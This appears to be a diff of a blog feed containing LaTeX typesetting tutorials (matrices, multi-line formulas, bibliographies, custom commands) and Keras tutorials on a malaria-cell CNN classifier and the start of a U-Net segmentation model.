    \begin{equation}
    a+b=b+a \label{eq:commutative}
    \end{equation}
\subsection{不编号公式equation*环境} % requires the amsmath package
    交换律见式\ref{eq:commutative2}
    \begin{equation*}
    a+b=b+a \label{eq:commutative2}
    \end{equation*}

    公式的编号与交叉引用也是自动实现的,
大家在排版中,要习惯于采用自动化的方式处理图、表、公式的编号与交叉引用。
    \end{document}

latex11 - Matrices in LaTeX math

Matrix environments:

• & separates columns
• \\ separates rows
    \documentclass{ctexart}

    \usepackage{amsmath}

    \newcommand{\adots}{\mathinner{\mkern2mu
    \raisebox{0.1em}{.}
    \mkern2mu\raisebox{0.4em}{.}
    \mkern2mu\raisebox{0.7em}{.}\mkern1mu}}

    \begin{document}
    \section{matrix环境}
    \[
    \begin{matrix}
    0 & 1 \\
    1 & 0
    \end{matrix}
    \]

    \section{pmatrix环境}
    \[
    \begin{pmatrix}
    0 & -1 \\
    1 & 0
    \end{pmatrix}
    \]

    \section{bmatrix环境}
    \[
    \begin{bmatrix}
    0 & -1 \\
    1 & 0
    \end{bmatrix}
    \]

    \section{Bmatrix环境}
    \[
    \begin{Bmatrix}
    0 & -1 \\
    1 & 0
    \end{Bmatrix}
    \]

    \section{vmatrix环境}
    \[
    \begin{vmatrix}
    0 & -1 \\
    1 & 0
    \end{vmatrix}
    \]

    \section{Vmatrix环境}
    \[
    \begin{Vmatrix}
    0 & -1 \\
    1 & 0
    \end{Vmatrix}
    \]

    \section{可以使用上下标}
    \[
    A = \begin{pmatrix}
    a_{11}^2 & a_{12}^2 & a_{13}^2 \\
    0 & a_{22} & a_{23} \\
    0 & 0 & a_{33}
    \end{pmatrix}
    \]

    \section{常用省略号:$\backslash$dots,$\backslash$vdots,$\backslash$ddots}
    没有$\backslash$adots,需要手动定义。
    \[
    A = \begin{bmatrix}
    a_{11} & \dots & a_{1n} \\
    \adots & \ddots & \vdots \\
    0 & & a_{nn}
    \end{bmatrix}_{n \times n}
    \]

    \section{分块矩阵(矩阵嵌套)}
    \[
    \begin{pmatrix}
    \begin{matrix}1&0\\0&1\end{matrix} & \text{\Large 0} \\
    \text{\Large 0} & \begin{matrix} 1&0\\0&-1\end{matrix}
    \end{pmatrix}
    \]

    \section{三角矩阵}
    \[
    \begin{pmatrix}
    a_{11} & a_{12} & \cdots & a_{1n} \\
    & a_{22} & \cdots & a_{2n} \\
    & & \ddots & \vdots \\
    \multicolumn{2}{c}{\raisebox{1.3ex}[0pt]{\Huge 0}} & & a_{nn}
    \end{pmatrix}
    \]

    \section{跨列的省略号} % \hdotsfor{columns}
    \[
    \begin{pmatrix}
    1 & \frac 12 & \dots & \frac 1n \\
    \hdotsfor{4} \\
m & \frac m2 & \dots & \frac mn
    \end{pmatrix}
    \]

    \section{行内小矩阵(smallmatrix)环境}
复数 $z = (x, y)$ 也可用矩阵
    \begin{math}
    \left(
    \begin{smallmatrix}
    x & -y \\
    y & -x
    \end{smallmatrix}
    \right)
    \end{math}
    来表示。

    \section{array环境(类似于表格环境tabular)}
    \[
    \begin{array}{r|r}
    \frac{1}{2} & 0 \\
    \hline
    0 & -\frac a{bc} \\
    \end{array}
    \]

    \section{用array环境构造复杂矩阵}
    \[
% @{<content>} inserts extra material without counting as a column
% here: a negative space shifting the next column left by 5pt
\begin{array}{c@{\hspace{-5pt}}l}
% row 1, column 1
    \left(
    \begin{array}{ccc|ccc}
    a & \cdots & a & b & \cdots & b \\
    & \ddots & \vdots & \vdots & \adots \\
    & a & b \\ \hline
    & & & c & \cdots & c \\
    & & & \vdots & & \vdots \\
    \multicolumn{3}{c|}{\raisebox{2ex}[0pt]{\Huge 0}} & c & \cdots & c
    \end{array}
    \right)
% row 1, column 2
\begin{array}{l}
% \left. merely pairs with \right\}; it prints nothing itself
    \left. \rule{0mm}{7mm}\right\}p \\
    \\
    \left.\rule{0mm}{7mm}\right\}q
    \end{array}
    \\[-5pt]
% row 2, column 1
    \begin{array}{cc}
    \underbrace{\rule{17mm}{0mm}}_m &
    \underbrace{\rule{17mm}{0mm}}_m
    \end{array}
& % row 2, column 2 (empty)
    \end{array}
    \]

    \end{document}

latex12 - Multi-line formulas in LaTeX math

    \documentclass{ctexart}

    \usepackage{amsmath}
    \usepackage{amssymb}

    \begin{document}
    \section{gather 标准多行公式}
    \subsection{gather 带编号}
    \begin{gather}
    a + b = b + a \\
ab = ba
    \end{gather}

    \subsection{gather* 不带编号}
    \begin{gather*}
    3+5=5+3=8 \\
    3 \times 5 = 5 \times 3
    \end{gather*}

    \subsection{在换行符前使用 notag 阻止编号}
    \begin{gather}
    3^2 + 4^2 = 5^2 \notag \\
    5^2 + 12^2 = 13^2 \notag \\
    a^2 + b^2 = c^2
    \end{gather}

    \section{align 对齐多行公式}
    \subsection{align 带编号}
    \begin{align}
    x & = t + \cos t + 1 \\
    y & = 2\sin t
    \end{align}

    \subsection{align* 不带编号}
    \begin{align*}
    x & = t & x & = \cos t & x & =t \\
    y & = 2t & y & = \sin(t+1) & y & = \sin t
    \end{align*}

    \section{split 环境(对齐采用 align 环境的方式,编号在中间)}
    \begin{equation}
    \begin{split}
    \cos 2x &= \cos^2x - \sin^2x \\
    &= 2\cos^2x - 1
    \end{split}
    \end{equation}

    \section{cases 环境}
    分段函数,每行公式中使用 \& 分割为两部分,通常表示值和后面的条件。
    \begin{equation}
    D(x) = \begin{cases}
    1, & \text{如果 } x \in \mathbb{Q}; \\
    0, & \text{如果 } x \in \mathbb{R}\setminus\mathbb{Q}.
    \end{cases}
    \end{equation}
    \end{document}

P13_latex13 - Bibliographies in LaTeX with BibTeX

Managing references directly in the tex file

\begin{thebibliography}{99}  % the 99 means entries are numbered and sets the width of the widest label, allowing up to 99 items; use a larger number if you have more
\bibitem[<label>]{<cite key>} reference entry 1
\bibitem[<label>]{<cite key>} reference entry 2
    ...
    \end{thebibliography}

An entry typically contains author, title, publisher, year, edition, pages, and so on.

Cite with \cite{<key1>, <key2>, ...}.


    \documentclass{ctexart}

    \begin{document}
    引用一篇文章\cite{article1} 引用一本书\cite{book1}等

    \begin{thebibliography}{99}
    \bibitem{article1}陈立辉,苏伟,蔡川,陈晓云.
\emph{基于 LaTeX 的 Web 数学公式提取方法研究}[J]. 计算机科学. 2014(06)

\bibitem{book1}William H. Press, Saul A. Teukolsky, William T. Vetterling, Brian P. Flannery,
\emph{Numerical Recipes 3rd Edition:
The Art of Scientific Computing},
Cambridge University Press, New York, 2007.

\bibitem{latexGuide} Kopka Helmut, W. Daly Patrick,
    \emph{Guide to \LaTeX}, $4^{th}$ Edition.
    Available at \texttt{http://www.amazon.com}.

    \bibitem{latexMath} Graetzer George, \emph{Math Into \LaTeX},
Birkhäuser Boston; 3rd edition (June 22, 2000).
    \end{thebibliography}
    \end{document}

Using BibTeX

Put the following into test.bib:

    @book{mittelbach2004,
title = {The {{\LaTeX}} Companion},
publisher = {Addison-Wesley},
    year = {2004},
    author = {Frank Mittelbach and Michel Goossens},
    series = {Tools and Techniques for Computer Typesetting},
    address = {Boston},
    edition = {Second}
    }

Multiple compilation passes are needed:
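A typical sequence with the plain latex workflow (xelatex works the same way; the .aux file carries the citation data between passes):

latex test.tex
bibtex test
latex test.tex
latex test.tex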

    \documentclass{ctexart}

\bibliographystyle{plain} % available styles: plain, unsrt, alpha, abbrv

    \begin{document}
    这是一个参考文献的引用:\cite{mittelbach2004}
    \bibliography{test}
    \end{document}
• \bibliography{test} pulls the entries from test.bib
• \cite{mittelbach2004} cites the entry mittelbach2004

Google Scholar, Baidu Scholar, and similar services can export references in bib format.

• Use \nocite{*} to list entries in the bibliography even if they are never cited in the text.

• Use Zotero to batch-collect BibTeX entries from websites.

• Use JabRef to manage the .bib files of your references.

P14_latex14 - Bibliographies in LaTeX with BibLaTeX

• biblatex/biber is the newer bibliography engine for $\TeX$.

• Its style files (bibliography styles in .bbx files, citation styles in .cbx files) are written in $\LaTeX$.

• It supports locale-aware sorting, e.g.:

  • biber -l zh__pinyin texfile sorts by pinyin
  • biber -l zh__stroke texfile sorts by stroke count

I couldn't get this to work; perhaps the bib file itself is at fault?
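If the caspervector style used below is unavailable, a minimal fallback sketch with the built-in numeric style (an assumption, not the author's setup) should still compile:

\documentclass{ctexart}
\usepackage[style=numeric, backend=biber]{biblatex} % built-in numeric style
\addbibresource{test.bib}
\begin{document}
\cite{mittelbach2004}
\printbibliography
\end{document}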

    \documentclass{ctexart}

    \usepackage[style=caspervector,
    backend=biber,utf8,sorting=ecnty]{biblatex}

    \addbibresource{test.bib}

    \begin{document}
% manage once, cite many times
    无格式化引用 \cite{2016An}

    带方括号的引用 \parencite{2016Analyzing}

    上标引用 \supercite{mittelbach2004}

\printbibliography[title = {参考文献}] % change the heading; the default is References
    \end{document}

P15_latex15 - Custom commands and environments in LaTeX

• \newcommand defines a new command
• Command names may consist of letters only and must not begin with \end
• \newcommand<command>[<number of args>][<default for first arg>]{<definition>}

Defining commands and environments is the key tool for customizing $\LaTeX$ formatting while keeping content separate from format. Wrapping fonts, sizes, indentation, alignment, spacing, and other fiddly details in commands and environments with meaningful names keeps the document structure clear, the code tidy, and maintenance easy.

When writing such macros, combine the existing commands, environments, and variables: the length variables, boxes, and font commands introduced earlier rarely appear directly in the body text; they are mostly used inside structured macro definitions.

    \documentclass{ctexart}

% \newcommand can be a simple string substitution, e.g.:
% \PRC expands to People's Republic of \emph{China}
    \newcommand\PRC{People's Republic of \emph{China}}

% \newcommand can also take parameters
% from 1 to 9 of them, referenced in the definition as #1, #2, ..., #9
    \newcommand\loves[2]{#1 喜欢 #2}
    \newcommand\hatedby[2]{#2 不受 #1 喜欢}

% parameters can have default values:
% giving the first parameter a default makes it optional
% (it is then supplied in square brackets)
    \newcommand\love[3][喜欢]{#2 #1 #3}

% \renewcommand - redefine a command
% same usage and effect as \newcommand, but only for existing commands
% \renewcommand<command>[<number of args>][<default for first arg>]{<definition>}
    \renewcommand\abstractname{内容简介}

% defining and redefining environments
% \newenvironment{<name>}[<number of args>][<default for first arg>]
% {<begin code>}
% {<end code>}
% \renewenvironment{<name>}[<number of args>][<default for first arg>]
% {<begin code>}
% {<end code>}

% an abstract environment for the book class
    \newenvironment{myabstract}[1][摘要]%
    {\small
    \begin{center}\bfseries #1\end{center}%
    \begin{quotation}}%
    {\end{quotation}}

% only the <begin code> can use the environment's parameters;
% the <end code> cannot.
% if needed, save the parameter in a command first and use that later:
    \newenvironment{Quotation}[1]%
    {\newcommand\quotesource{#1}%
    \begin{quotation}}
    {\par\hfill---《\textit{\quotesource}》
    \end{quotation}}

    \begin{document}

    \PRC

    \loves{猫儿}{鱼}

    \hatedby{猫儿}{萝卜}

    \love{猫儿}{鱼}

    \love[最爱]{猫儿}{鱼}

    \begin{abstract}
    这是一段摘要...
    \end{abstract}

    \begin{myabstract}
    这是一段自定义摘要...
    \end{myabstract}

    \begin{Quotation}{易$\cdot$乾}
    初九,潜龙勿用。
    \end{Quotation}

    \end{document}
    ]]>
    @@ -8633,7 +8633,7 @@ /posts/Diary-%E7%BB%93%E6%9D%9F%E4%BA%86%E7%96%AB%E5%BE%80%E6%83%85%E6%B7%B1%E7%9A%842022/ -
    ]]>
    +
    ]]>
    @@ -8687,7 +8687,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(70-71)-Deep%20Learning/ - 正文


    ]]>
+ Main text

    70 - An overview of deep learning and neural networks

Traditional machine learning: extract features, then build a model.

CNN (deep convolutional network): input - convolution layers - pooling layers - fully connected layers.

There can be many convolution and pooling layers.

INPUT_SHAPE = (64, 64, 3)  # change to (SIZE, SIZE, 3)
inp = keras.layers.Input(shape=INPUT_SHAPE)
conv1 = keras.layers.Conv2D(32, kernel_size=(3, 3), activation='relu', padding='same')(inp)
pool1 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv1)
norm1 = keras.layers.BatchNormalization(axis=-1)(pool1)
drop1 = keras.layers.Dropout(rate=0.2)(norm1)
conv2 = keras.layers.Conv2D(32, kernel_size=(3, 3), activation='relu', padding='same')(drop1)
pool2 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv2)
norm2 = keras.layers.BatchNormalization(axis=-1)(pool2)
drop2 = keras.layers.Dropout(rate=0.2)(norm2)
flat = keras.layers.Flatten()(drop2)
hidden1 = keras.layers.Dense(512, activation='relu')(flat)
norm3 = keras.layers.BatchNormalization(axis=-1)(hidden1)
drop3 = keras.layers.Dropout(rate=0.2)(norm3)
hidden2 = keras.layers.Dense(256, activation='relu')(drop3)
norm4 = keras.layers.BatchNormalization(axis=-1)(hidden2)
drop4 = keras.layers.Dropout(rate=0.2)(norm4)

out = keras.layers.Dense(2, activation='sigmoid')(drop4)  # units=1 gives an error here
model = keras.Model(inputs=inp, outputs=out)
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])

    A few keywords to understand:


    TensorFlow and Keras

    • TensorFlow
      • TensorFlow is the most famous library used in production for deep learning models.
      • TensorFlow is not that easy to use.
    • Keras
  • Keras is a high-level API built on TensorFlow (and also on Theano).
  • Keras is more user-friendly than TensorFlow - it lets you quickly build and test networks with minimal effort.

• Convolution and pooling

    BatchNormalization

    • Normalization is important to keep the values in input and hidden layers within certain range.
    • Normalizing usually improves training speed.
    • Batch normalization allows each layer of a network to learn by itself a little bit more independently of other layers.
• We can use higher learning rates because batch normalization makes sure that there's no activation that's gone really high or really low.

Dropout (usually implemented by zeroing out weights)

    • The term “dropout” refers to dropping out neurons at random in a neural network.
    • Dropout is needed to prevent over-fitting.


    Flattening

    • The flattening step creates a long vector that is needed as input to the artificial neural network.


    Dense layer

    • Input (features)
    • Hidden Layers (lots of layers ~ “deep learning”)
      • neuron (Weight, bias and activation function)
    • Output (prediction)

Activation: modeled on the biological neuron

Optimizer: Adam

• Optimizer → choice of optimizer algorithm → good results in minutes, hours, or days.

• Adam optimization is an extension of stochastic gradient descent.

• Adam is the optimizer most often used for CNNs.

Loss Functions - Categorical cross-entropy

    • A loss function (or cost function) is a method of evaluating how well your algorithm models your dataset.
    • Good prediction → low value for loss (Bad → high loss value)
    • Cross-entropy loss function is commonly used for CNN.
    • Mean square error is an example of basic loss function for linear regression.


    Epoch and other terms

• When the data is too big, we break it into smaller batches so the computer can handle it.

• One epoch is when the ENTIRE dataset is passed forward and backward through the neural network ONCE.

• Batch Size is the number of training samples in one forward/backward pass.

• Number of iterations = number of passes.

• Example: if we have 100 training samples and the batch size is set to 25, it takes 4 iterations to complete 1 epoch (see the formula below).
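Written as a formula (a restatement of the example above, not from the original): $\text{iterations per epoch} = \lceil N_\text{samples} / \text{batch size} \rceil = \lceil 100 / 25 \rceil = 4$.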

What is the right number of epochs?

No one knows; it depends on the problem!

    71 - Malarial cell classification using CNN

    import numpy as np
    import cv2
    import os
    from PIL import Image
    import keras

    np.random.seed(1000)
os.environ['KERAS_BACKEND'] = 'tensorflow' # set the backend to tensorflow; theano also works if you prefer

• Load the input images (500 uninfected cells and 500 parasitized cells)
    image_directory = 'cell_images2/'
    SIZE = 64
    dataset = []
    label = []
• Load the parasitized cells and label them 0
parasitized_images = os.listdir(image_directory + 'Parasitized/')
for i, image_name in enumerate(parasitized_images):
    if image_name.split('.')[1] == 'png':  # only read PNG files
        image = cv2.imread(image_directory + 'Parasitized/' + image_name)  # read the image as an np.array
        image = Image.fromarray(image, 'RGB')  # convert the array to a PIL image
        image = image.resize((SIZE, SIZE))  # resize
        dataset.append(np.array(image))  # add to the dataset
        label.append(0)  # record the label
• Load the uninfected cells and label them 1
uninfected_images = os.listdir(image_directory + 'Uninfected/')
for i, image_name in enumerate(uninfected_images):
    if image_name.split('.')[1] == 'png':
        image = cv2.imread(image_directory + 'Uninfected/' + image_name)
        image = Image.fromarray(image, 'RGB')
        image = image.resize((SIZE, SIZE))
        dataset.append(np.array(image))
        label.append(1)

• Build the CNN

  • 2 conv and pool layers, with some normalization and dropout in between.
• Input layer

    INPUT_SHAPE = (SIZE, SIZE, 3)
    inp = keras.layers.Input(shape=INPUT_SHAPE)
    conv1 = keras.layers.Conv2D(32, kernel_size=(3, 3),
    activation='relu', padding='same')(inp)
    pool1 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv1)
    norm1 = keras.layers.BatchNormalization(axis=-1)(pool1)
    drop1 = keras.layers.Dropout(rate=0.2)(norm1)
• Convolution layer 2
    conv2 = keras.layers.Conv2D(32, kernel_size=(3, 3),
    activation='relu', padding='same')(drop1)
• Pooling layer 2
    pool2 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv2)
    • Normalization 2
    norm2 = keras.layers.BatchNormalization(axis=-1)(pool2)
    • Dropout 2
    drop2 = keras.layers.Dropout(rate=0.2)(norm2)
• Flatten layer
  • Flatten the matrix to get it ready for dense.
    flat = keras.layers.Flatten()(drop2)
    hidden1 = keras.layers.Dense(512, activation='relu')(flat)
    • Normalization 3
    norm3 = keras.layers.BatchNormalization(axis=-1)(hidden1)
    • Dropout 3
    drop3 = keras.layers.Dropout(rate=0.2)(norm3)
• Hidden layer 2
    hidden2 = keras.layers.Dense(256, activation='relu')(drop3)
    • Normalization 4
    norm4 = keras.layers.BatchNormalization(axis=-1)(hidden2)
• Dropout 4
    drop4 = keras.layers.Dropout(rate=0.2)(norm4)
• Output layer
    out = keras.layers.Dense(2, activation='sigmoid')(drop4)
    model = keras.Model(inputs=inp, outputs=out)
    model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
    from tensorflow.keras import utils
    from keras.utils.vis_utils import model_to_dot

    utils.plot_model(model, 'model1.png',show_shapes=True,show_dtype=True,show_layer_names=True)

    model.summary()
    Model: "model"_________________________________________________________________ Layer (type)                Output Shape              Param #   ================================================================= input_1 (InputLayer)        [(None, 64, 64, 3)]       0                                                                           conv2d (Conv2D)             (None, 64, 64, 32)        896                                                                         max_pooling2d (MaxPooling2D  (None, 32, 32, 32)       0          )                                                                                                                                 batch_normalization (BatchN  (None, 32, 32, 32)       128        ormalization)                                                                                                                     dropout (Dropout)           (None, 32, 32, 32)        0                                                                           conv2d_1 (Conv2D)           (None, 32, 32, 32)        9248                                                                        max_pooling2d_1 (MaxPooling  (None, 16, 16, 32)       0          2D)                                                                                                                               batch_normalization_1 (Batc  (None, 16, 16, 32)       128        hNormalization)                                                                                                                   dropout_1 (Dropout)         (None, 16, 16, 32)        0                                                                           flatten (Flatten)           (None, 8192)              0                                                                           dense (Dense)               (None, 512)               4194816                                                                     batch_normalization_2 (Batc  (None, 512)              2048       hNormalization)                                                                                                                   dropout_2 (Dropout)         (None, 512)               0                                                                           dense_1 (Dense)             (None, 256)               131328                                                                      batch_normalization_3 (Batc  (None, 256)              1024       hNormalization)                                                                                                                   dropout_3 (Dropout)         (None, 256)               0                                                                           dense_2 (Dense)             (None, 2)                 514                                                                        =================================================================Total params: 4,340,130Trainable params: 4,338,466Non-trainable params: 1,664_________________________________________________________________

    Reference: "How the parameters of a convolutional neural network are calculated" (qian99's CSDN blog)

    | Layer | Input | Filters/Units | Kernel size | Stride | Output | Parameters |
    |---|---|---|---|---|---|---|
    | input | 64x64x3 (H x W x C) | - | - | - | 64x64x3 | 0 |
    | conv2d | 64x64x3 | 32 | 3x3 | 1 | 64x64x32 | 32x3x3x3+32 = 896 |
    | max_pooling2d | 64x64x32 | - | 2x2 | None | (64/2)x(64/2)x32 | 0 |
    | batch_normalization | 32x32x32 | - | - | - | 32x32x32 | 128 |
    | dropout | 32x32x32 | - | - | - | 32x32x32 | 0 |
    | conv2d_1 | 32x32x32 | 32 | 3x3 | 1 | 32x32x32 | 32x3x3x32+32 = 9248 |
    | max_pooling2d_1 | 32x32x32 | - | 2x2 | None | (32/2)x(32/2)x32 | 0 |
    | batch_normalization_1 | 16x16x32 | - | - | - | 16x16x32 | 128 |
    | dropout_1 | 16x16x32 | - | - | - | 16x16x32 | 0 |
    | flatten | 16x16x32 | - | - | - | 16x16x32 = 8192 | 0 |
    | dense | 8192 | 512 | - | - | 512 | 8192x512+512 = 4194816 |
    | batch_normalization_2 | 512 | - | - | - | 512 | 2048 |
    | dropout_2 | 512 | - | - | - | 512 | 0 |
    | dense_1 | 512 | 256 | - | - | 256 | 512x256+256 = 131328 |
    | batch_normalization_3 | 256 | - | - | - | 256 | 1024 |
    | dropout_3 | 256 | - | - | - | 256 | 0 |
    | dense_2 | 256 | 2 | - | - | 2 | 256x2+2 = 514 |

    Each BatchNormalization layer carries 4 parameters per channel (gamma, beta, moving mean, moving variance); the two moving statistics are not trained, which is exactly where the 1,664 non-trainable parameters in the summary come from (half of 128 + 128 + 2048 + 1024 = 3,328).
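
    A minimal sketch to sanity-check the formulas in the table above (the helper names conv_params / dense_params / bn_params are illustrative, not from the original post):

    def conv_params(n_filters, kh, kw, in_channels):
        # one weight per kernel element per input channel, plus one bias per filter
        return n_filters * kh * kw * in_channels + n_filters

    def dense_params(n_in, n_out):
        # fully connected: one weight per input-output pair, plus one bias per unit
        return n_in * n_out + n_out

    def bn_params(channels):
        # gamma, beta, moving mean, moving variance per channel
        return 4 * channels

    print(conv_params(32, 3, 3, 3))    # 896
    print(conv_params(32, 3, 3, 32))   # 9248
    print(dense_params(8192, 512))     # 4194816
    print(dense_params(512, 256))      # 131328
    print(dense_params(256, 2))        # 514
    print(bn_params(32), bn_params(512), bn_params(256))  # 128 2048 1024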

    • Set up the training and test sets, then start training
    from sklearn.model_selection import train_test_split
    from keras.utils import to_categorical

    X_train, X_test, y_train, y_test = train_test_split(dataset,
                                                        to_categorical(np.array(label)),
                                                        test_size=0.20,
                                                        random_state=0)
    history = model.fit(np.array(X_train), y_train, batch_size=64, verbose=1, epochs=25, validation_split=0.1, shuffle=False)
    Epoch 1/25: 12/12 - 9s 99ms/step - loss: 0.9405 - accuracy: 0.6444 - val_loss: 31.2568 - val_accuracy: 0.5625
    Epoch 2/25: 12/12 - 0s 37ms/step - loss: 0.5048 - accuracy: 0.7472 - val_loss: 23.6857 - val_accuracy: 0.5625
    Epoch 3/25: 12/12 - 0s 37ms/step - loss: 0.3281 - accuracy: 0.8417 - val_loss: 17.8224 - val_accuracy: 0.5625
    Epoch 4/25: 12/12 - 0s 37ms/step - loss: 0.2036 - accuracy: 0.9250 - val_loss: 14.3039 - val_accuracy: 0.5625
    Epoch 5/25: 12/12 - 0s 37ms/step - loss: 0.1568 - accuracy: 0.9431 - val_loss: 13.0039 - val_accuracy: 0.5625
    Epoch 6/25: 12/12 - 0s 37ms/step - loss: 0.1074 - accuracy: 0.9694 - val_loss: 7.4553 - val_accuracy: 0.5625
    Epoch 7/25: 12/12 - 0s 37ms/step - loss: 0.0858 - accuracy: 0.9778 - val_loss: 3.5444 - val_accuracy: 0.5500
    Epoch 8/25: 12/12 - 0s 37ms/step - loss: 0.0608 - accuracy: 0.9819 - val_loss: 4.7493 - val_accuracy: 0.5500
    Epoch 9/25: 12/12 - 0s 37ms/step - loss: 0.0632 - accuracy: 0.9764 - val_loss: 4.7916 - val_accuracy: 0.5625
    Epoch 10/25: 12/12 - 0s 36ms/step - loss: 0.0432 - accuracy: 0.9889 - val_loss: 1.9020 - val_accuracy: 0.5875
    Epoch 11/25: 12/12 - 0s 36ms/step - loss: 0.0489 - accuracy: 0.9847 - val_loss: 2.2950 - val_accuracy: 0.5750
    Epoch 12/25: 12/12 - 0s 37ms/step - loss: 0.0458 - accuracy: 0.9861 - val_loss: 0.8035 - val_accuracy: 0.7625
    Epoch 13/25: 12/12 - 0s 38ms/step - loss: 0.0264 - accuracy: 0.9958 - val_loss: 1.4798 - val_accuracy: 0.6500
    Epoch 14/25: 12/12 - 0s 38ms/step - loss: 0.0244 - accuracy: 0.9931 - val_loss: 1.6248 - val_accuracy: 0.6625
    Epoch 15/25: 12/12 - 0s 38ms/step - loss: 0.0160 - accuracy: 0.9958 - val_loss: 1.2913 - val_accuracy: 0.7125
    Epoch 16/25: 12/12 - 0s 39ms/step - loss: 0.0169 - accuracy: 0.9958 - val_loss: 1.4256 - val_accuracy: 0.6875
    Epoch 17/25: 12/12 - 0s 40ms/step - loss: 0.0114 - accuracy: 0.9986 - val_loss: 1.2699 - val_accuracy: 0.7000
    Epoch 18/25: 12/12 - 0s 39ms/step - loss: 0.0158 - accuracy: 0.9972 - val_loss: 0.7563 - val_accuracy: 0.7875
    Epoch 19/25: 12/12 - 0s 39ms/step - loss: 0.0133 - accuracy: 0.9972 - val_loss: 0.6219 - val_accuracy: 0.8500
    Epoch 20/25: 12/12 - 0s 38ms/step - loss: 0.0194 - accuracy: 0.9958 - val_loss: 0.7935 - val_accuracy: 0.8500
    Epoch 21/25: 12/12 - 0s 38ms/step - loss: 0.0174 - accuracy: 0.9972 - val_loss: 2.8081 - val_accuracy: 0.5625
    Epoch 22/25: 12/12 - 0s 38ms/step - loss: 0.0188 - accuracy: 0.9931 - val_loss: 0.6510 - val_accuracy: 0.8000
    Epoch 23/25: 12/12 - 0s 38ms/step - loss: 0.0340 - accuracy: 0.9903 - val_loss: 1.6654 - val_accuracy: 0.6250
    Epoch 24/25: 12/12 - 0s 38ms/step - loss: 0.0248 - accuracy: 0.9931 - val_loss: 0.8992 - val_accuracy: 0.7625
    Epoch 25/25: 12/12 - 0s 38ms/step - loss: 0.0201 - accuracy: 0.9917 - val_loss: 2.0561 - val_accuracy: 0.7250

    • Check the results
    print("Test_Accuracy: {:.2f}%".format(model.evaluate(np.array(X_test), np.array(y_test))[1]*100))
    7/7 [==============================] - 0s 17ms/step - loss: 1.7793 - accuracy: 0.6950
    Test_Accuracy: 69.50%
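
    Accuracy alone can hide how the two classes behave individually. A minimal sketch (not part of the original notebook) that prints a confusion matrix for the test set:

    from sklearn.metrics import confusion_matrix

    y_pred = model.predict(np.array(X_test)).argmax(axis=1)  # predicted class index per image
    y_true = np.array(y_test).argmax(axis=1)                 # undo the one-hot encoding
    print(confusion_matrix(y_true, y_pred))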
    import matplotlib.pyplot as plt

    f, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4))
    t = f.suptitle('CNN Performance', fontsize=12)
    f.subplots_adjust(top=0.85, wspace=0.3)

    # Plot training & validation accuracy
    max_epoch = len(history.history['accuracy'])+1
    epoch_list = list(range(1,max_epoch))
    ax1.plot(epoch_list, history.history['accuracy'], label='Train Accuracy')
    ax1.plot(epoch_list, history.history['val_accuracy'], label='Validation Accuracy')
    ax1.set_xticks(np.arange(1, max_epoch, 5))
    ax1.set_ylabel('Accuracy Value')
    ax1.set_xlabel('Epoch')
    ax1.set_title('Accuracy')
    l1 = ax1.legend(loc="best")

    # Plot training & validation loss
    ax2.plot(epoch_list, history.history['loss'], label='Train Loss')
    ax2.plot(epoch_list, history.history['val_loss'], label='Validation Loss')
    ax2.set_xticks(np.arange(1, max_epoch, 5))
    ax2.set_ylabel('Loss Value')
    ax2.set_xlabel('Epoch')
    ax2.set_title('Loss')
    l2 = ax2.legend(loc="best")

    (figure: training/validation accuracy and loss curves)

    From these curves we can infer that too many epochs were run and the model has overfit; see the sketch below for one way to counter this.
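
    A hypothetical fix (not in the original code): stop training once validation loss stops improving, and roll back to the best weights seen so far.

    from tensorflow import keras

    # Early stopping on val_loss; patience=3 is an assumed value, tune as needed
    early_stop = keras.callbacks.EarlyStopping(monitor='val_loss', patience=3,
                                               restore_best_weights=True)
    history = model.fit(np.array(X_train), y_train, batch_size=64, epochs=25,
                        validation_split=0.1, callbacks=[early_stop])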


    • Save the model
    model.save('malaria_cnn.h5')
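
    To reuse the saved model later it can be loaded back; a minimal sketch, assuming the 'malaria_cnn.h5' file saved above:

    from tensorflow import keras

    loaded = keras.models.load_model('malaria_cnn.h5')        # same file as saved above
    preds = loaded.predict(np.array(X_test)).argmax(axis=1)   # class indices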


    ]]>
    @@ -8714,7 +8714,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(73-78)-U-net/ - 正文

    + 正文

    73 - Image Segmentation using U-Net - Part 1 (What is U-net?)

    The video walks through several diagrams (figures omitted here):

    • Architecture of a convolutional neural network
    • Common convolutional neural network architectures
    • U-Net
    • VGG diagram and its code
    • The U-Net architecture is designed for semantic segmentation

    74 - Image Segmentation using U-Net - Part 2 (Defining U-Net in Python using Keras)

    import tensorflow as tf

    IMG_WIDTH = 128
    IMG_HEIGHT = 128
    IMG_CHANNELS = 3

    Build the model:

    inputs = tf.keras.layers.Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))
    s = tf.keras.layers.Lambda(lambda x: x / 255)(inputs) # normalize pixel values to [0, 1] (uint8 -> float)

    # Contraction path (encoder)
    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(s)
    c1 = tf.keras.layers.Dropout(0.1)(c1)
    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c1)
    p1 = tf.keras.layers.MaxPooling2D((2, 2))(c1)

    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p1)
    c2 = tf.keras.layers.Dropout(0.1)(c2)
    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c2)
    p2 = tf.keras.layers.MaxPooling2D((2, 2))(c2)

    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p2)
    c3 = tf.keras.layers.Dropout(0.2)(c3)
    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c3)
    p3 = tf.keras.layers.MaxPooling2D((2, 2))(c3)

    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p3)
    c4 = tf.keras.layers.Dropout(0.2)(c4)
